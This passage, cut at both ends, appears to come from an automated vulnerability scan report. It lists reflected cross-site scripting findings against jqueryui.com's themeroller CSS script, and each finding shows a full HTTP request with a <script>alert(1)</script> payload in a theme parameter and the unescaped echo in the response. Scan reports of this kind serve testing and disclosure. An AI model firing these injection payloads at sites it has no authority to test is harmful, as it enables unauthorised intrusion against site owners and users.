Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:29 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17315


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
e, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngacecc<script>alert(1)</script>26b01a07e1b&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

3.119. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHover request parameter is copied into the HTML document as plain text between tags. The payload 2c125<script>alert(1)</script>6ceec36038d was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png2c125<script>alert(1)</script>6ceec36038d&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:35 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17315


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png2c125<script>alert(1)</script>6ceec36038d&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family:
...[SNIP]...

3.120. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorActive request parameter is copied into the HTML document as plain text between tags. The payload d23ac<script>alert(1)</script>4ffff291042 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaad23ac<script>alert(1)</script>4ffff291042&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:03 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17458


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaad23ac<script>alert(1)</script>4ffff291042&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1
...[SNIP]...

3.121. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorContent request parameter is copied into the HTML document as plain text between tags. The payload f629d<script>alert(1)</script>f3a6ea2ba44 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaaf629d<script>alert(1)</script>f3a6ea2ba44&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:32 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaaf629d<script>alert(1)</script>f3a6ea2ba44&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

3.122. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorDefault request parameter is copied into the HTML document as plain text between tags. The payload 92b1e<script>alert(1)</script>b988670b439 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d392b1e<script>alert(1)</script>b988670b439&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:34 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d392b1e<script>alert(1)</script>b988670b439&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/

...[SNIP]...

3.123. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHeader request parameter is copied into the HTML document as plain text between tags. The payload bf157<script>alert(1)</script>488388caa03 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaabf157<script>alert(1)</script>488388caa03&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:30 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaabf157<script>alert(1)</script>488388caa03&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

3.124. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHover request parameter is copied into the HTML document as plain text between tags. The payload 3fbde<script>alert(1)</script>8b0960fee62 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=9999993fbde<script>alert(1)</script>8b0960fee62&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:36 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=9999993fbde<script>alert(1)</script>8b0960fee62&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
...[SNIP]...

3.125. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the cornerRadius request parameter is copied into the HTML document as plain text between tags. The payload 6bcef<script>alert(1)</script>c81373b8746 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6bcef<script>alert(1)</script>c81373b8746&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
